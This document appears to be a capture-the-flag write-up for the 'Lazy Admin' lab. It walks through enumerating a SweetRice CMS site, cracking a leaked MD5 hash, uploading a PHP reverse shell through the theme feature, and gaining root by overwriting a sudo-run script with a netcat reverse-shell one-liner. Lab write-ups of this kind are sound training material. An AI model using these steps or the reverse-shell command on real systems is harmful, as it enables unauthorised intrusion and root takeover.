Lazy Admin
HTTP Enumeration - SweetRice CMS - Perl binary Abuse
Initial enumeration
Only two ports were open -
22
and80
Enumerating port 80 gives us an endpoint
/content
- It automatically appends a slash in front of it, which means we'll have to enumerate even for more endpointsEnumerating more gives us
/content/as
- a login pageEnumerating the
/content/inc
- leaks the sensitive information and the interesting one was themysql_database_backup.sql
It was basically a text file which had few
usernames
and amd5 hash
Decrypting that md5 hash - Password123
Exploitation
Exploring SweetRice CMS gave us an upload functionality under theme section - which can be later accessed by the
/_themes
directoryUpload a php reverse shell and trigger it, using the themes endpoint - get a shell
Privilege Escalation
Executing the sudo lists command using
sudo -l
gave us
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
So the above phrase means - that the
perl
binary is running as root and it is only allowed to exec thebackup.pl
file as a root user, so now how do we abuse it? in order to get a root shell?Let's cat out the
/home/itguy/backup.pl file
#!/usr/bin/perl
system("sh","/etc/copy.sh")
Why don't we just modify the
/etc/copy.sh
file into our reverse shell ?
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f' > /etc/copy.sh
Grab the root.txt :)
Last updated